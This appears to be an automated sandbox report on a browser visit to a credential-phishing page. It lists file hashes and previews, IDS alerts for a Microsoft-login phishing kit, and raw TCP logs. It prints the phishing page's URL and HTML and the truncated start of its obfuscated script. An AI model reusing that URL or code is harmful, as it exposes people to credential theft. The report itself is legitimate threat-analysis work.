                                            Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:SVG Scalable Vector Graphics image
                                            Category:dropped
                                            Size (bytes):1636
                                            Entropy (8bit):4.214613323368661
                                            Encrypted:false
                                            SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                            MD5:F7AB697E65B83CE9870A4736085DEEEC
                                            SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                            SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                            SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                            Malicious:false
                                            Reputation:low
                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                            Category:downloaded
                                            Size (bytes):100217
                                            Entropy (8bit):4.51688839918228
                                            Encrypted:false
                                            SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAF:ix2wtA4+eS6e6+XE3TLJCLIlAF
                                            MD5:69858F1D6AA467818FEE39E46BFAADDB
                                            SHA1:7CE20EEC85C8DE3644C0367CDFCE8972BFE3C25B
                                            SHA-256:31F0972C467CB759E8A0C3790AF92329D9AB6F940DFA8D43AA02A609D2B5C09B
                                            SHA-512:101C431D95D136A1AE598660DFE4C3812DE06DD1F9D4280EC80D0A9CE5E4FF1D30F07827B91DFCE78100784C34F0AAF2F58E921304E9DB034516AD97A31AA849
                                            Malicious:false
                                            Reputation:low
                                            URL:https://betacambridge.com/n/jsnom.js
                                            Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:HTML document, ASCII text
                                            Category:downloaded
                                            Size (bytes):366
                                            Entropy (8bit):5.598897450707646
                                            Encrypted:false
                                            SSDEEP:6:5mWxuJGzxAmSz56CiwAGfOVZA+WLShJTIP5TNm5dSUmxDeY4NhdA1BYXXfbwY4NM:4WYcVAh56CDAWOvfWLSsPZ45dWDd4Nb1
                                            MD5:4AADC8715213EFBEEF080A371BDB3FE1
                                            SHA1:CFF8BD7FEEA22E2645E2FD7952F0C132A9ADF673
                                            SHA-256:C8E2DF6909EE621365CFF81E36C99325E343085F0927BD1F29A62334C91F9FD9
                                            SHA-512:281C1E9E354D1B59FC67E3804F8EF6641C3F6E1B713DD4123E395E1959B0D1070558DE2892D2E58A1860757311C47E754DD69BF5785C29AF20F82C75D0C3C4C3
                                            Malicious:false
                                            Reputation:low
                                            URL:https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N
                                            Preview:.<!DOCTYPE html>.<html id='html' sti='VlZORlVqSTVNVEF5TURJMFZUUXdNVEF5T1RJdw==' vic='' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsnom.js'></script>.</html>
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                            Category:downloaded
                                            Size (bytes):1435
                                            Entropy (8bit):7.8613342322590265
                                            Encrypted:false
                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                            Malicious:false
                                            Reputation:low
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                            Category:downloaded
                                            Size (bytes):276
                                            Entropy (8bit):7.316609873335077
                                            Encrypted:false
                                            SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                            MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                            SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                            SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                            SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                            Malicious:false
                                            Reputation:low
                                            URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                            Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):2228
                                            Entropy (8bit):7.82817506159911
                                            Encrypted:false
                                            SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                            MD5:EF9941290C50CD3866E2BA6B793F010D
                                            SHA1:4736508C795667DCEA21F8D864233031223B7832
                                            SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                            SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                            Malicious:false
                                            Reputation:low
                                            Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:Unicode text, UTF-8 text, with very long lines (62988)
                                            Category:dropped
                                            Size (bytes):63929
                                            Entropy (8bit):3.856926049443178
                                            Encrypted:false
                                            SSDEEP:768:qt9Ha2rOVjb7Kahf/C/v/H/uXNrJK0gTfTITdT6T2TNTsTYWtO4epu5okdLtXTXT:ib8J+apQ3jx2wtA4+eS6r
                                            MD5:94362AD31F4B52BC166DDCE3C5699348
                                            SHA1:C813F9713F0B14D1EA8B97D345A0E2019D7EBFE2
                                            SHA-256:3A68500826682952522F0AE275FBC3F6DB99EFC1740E0040F1CFA6BA619C3386
                                            SHA-512:7FD7168BAA759EC242CD4EFA50B92EC0F8398432ABEC5F1D7BBA092BA486B4A412260A996AD07D417A88DC4F765048CF3E57C3E877ECB20DE1A11CFC25748077
                                            Malicious:false
                                            Reputation:low
                                            Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:SVG Scalable Vector Graphics image
                                            Category:downloaded
                                            Size (bytes):1636
                                            Entropy (8bit):4.214613323368661
                                            Encrypted:false
                                            SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                            MD5:F7AB697E65B83CE9870A4736085DEEEC
                                            SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                            SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                            SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                            Malicious:false
                                            Reputation:low
                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                            Category:downloaded
                                            Size (bytes):673
                                            Entropy (8bit):7.6596900876595075
                                            Encrypted:false
                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                            MD5:0E176276362B94279A4492511BFCBD98
                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                            Malicious:false
                                            Reputation:low
                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                            Category:downloaded
                                            Size (bytes):1651
                                            Entropy (8bit):7.823076718916614
                                            Encrypted:false
                                            SSDEEP:24:2V4Ub3vMJkyNe5mpz6uCVNVEPjVVU4G9RVvRiDQtcO3cTW1XezN3cJMSZPQTS:2H/0gmpJCvIjVVUjiDQSO3cTb3JEQS
                                            MD5:E9D1BCBF18997317C23FD219F0167EE1
                                            SHA1:1ED9CAC7484191C27E50137E2D59ED0B763D181F
                                            SHA-256:3622948BFCB6676D67F4F747B031C94DEEB238B5B84B96FD81FBFB93D42E88B9
                                            SHA-512:7929AB94AFB191BF62BDBF809F1FACC1349B8B478A55AE466C7E574C92B965ECB52A8C65160A301E08C96DB404CB18A2FAE8A7D05EA516F8CF0B537E18ADB9E3
                                            Malicious:false
                                            Reputation:low
                                            URL:https://www.betacambridge.com/wp-content/uploads/2020/06/cropped-Beta-cambridge-school-logo-1-32x32.png
                                            Preview:.PNG........IHDR... ... .....szz.....pHYs..........+.....%IDATX...l.g.._..}.{..]..k.@C.............)q.%..q.....IG..s3&.0t.6.d8..`.......X.c.......j.^..~~....w-..f....?.7wy...?...}...{....0...~:.t|..... .Zi9z..HG.p...Df....?.....{>Z.S..@..k.".......vm....1r.^.CFyb.i%.........B..~.(/?h..;............ZK......'.&...T..^l.D#[..3..!.@U.....[......F..v....j[.Nz...S;....U%.h.[.....[.n..0..}.......R.^=c..o(..`._J...z....Q. 1x.RO:....0...>.KW:.....9s_.,Yprl../..C.....l.7.v.....D...-....d.6........@...S...%"...~.L...x..w....p.$...@....._.._y.k.?..8..........Y.k....V.....=....g.......F..{.A.l.oZt`.4F..;^.m.)..kM:S....m.0..W8.r.N..|.0...&..y$.<k..ay..~...]..F)..]......^^..}...h..c....-.d...D.Fc..4....-1....T.. ..o...A?.}sV.?R.i....~...-&e.Q].o...s..}..T......S.P|......%<.iL.#.g....k....!..P......5Y..{....{zT&3%..kI.....W.....yS.E...H.m,qY......G.x3<...@.ogfX.[..\.1...W.......7]X."...rhh.u=.../..w.].....O...+.R.#z..#pl.6....`...e...N]....Bd.....'..}/o
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                            Category:dropped
                                            Size (bytes):673
                                            Entropy (8bit):7.6596900876595075
                                            Encrypted:false
                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                            MD5:0E176276362B94279A4492511BFCBD98
                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                            Malicious:false
                                            Reputation:low
                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                            No static file info
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-11-18T21:15:45.602122+01002057333ET PHISHING MAMBA Credential Phish Landing Page 2024-11-081192.168.2.449736192.232.223.48443TCP
                                            2024-11-18T21:15:45.739599+01002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.449735192.232.223.48443TCP
                                            2024-11-18T21:15:47.340844+01002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.449739192.232.223.48443TCP
                                            2024-11-18T21:15:48.754826+01002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.449743192.232.223.48443TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 18, 2024 21:15:37.985284090 CET49675443192.168.2.4173.222.162.32
                                            Nov 18, 2024 21:15:44.446861029 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:44.446959019 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:44.447047949 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:44.447294950 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:44.447346926 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:44.447417974 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:44.447741032 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:44.447772980 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:44.448008060 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:44.448024988 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.137128115 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.137495995 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.137526035 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.138590097 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.138672113 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.140152931 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.140229940 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.140337944 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.140352011 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.141196012 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.141434908 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.141460896 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.143105984 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.143186092 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.144216061 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.144325972 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.222094059 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.317296028 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.317342997 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.515533924 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.602129936 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.602150917 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.602159023 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.602207899 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.602226019 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.603110075 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.603159904 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.630580902 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.630604982 CET44349736192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.630615950 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.630781889 CET49736443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.737792969 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.737833023 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.737963915 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.738423109 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.738431931 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.738938093 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.739033937 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.739110947 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.739238977 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.739283085 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.739466906 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.739518881 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.739686012 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.739743948 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.739788055 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.739788055 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.739816904 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:45.739902020 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:45.739918947 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:46.594209909 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:46.601387978 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:46.601404905 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:46.601761103 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:46.607249975 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:46.607321024 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:46.646899939 CET49740443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:15:46.646998882 CET44349740142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:15:46.647089005 CET49740443192.168.2.4142.250.185.164
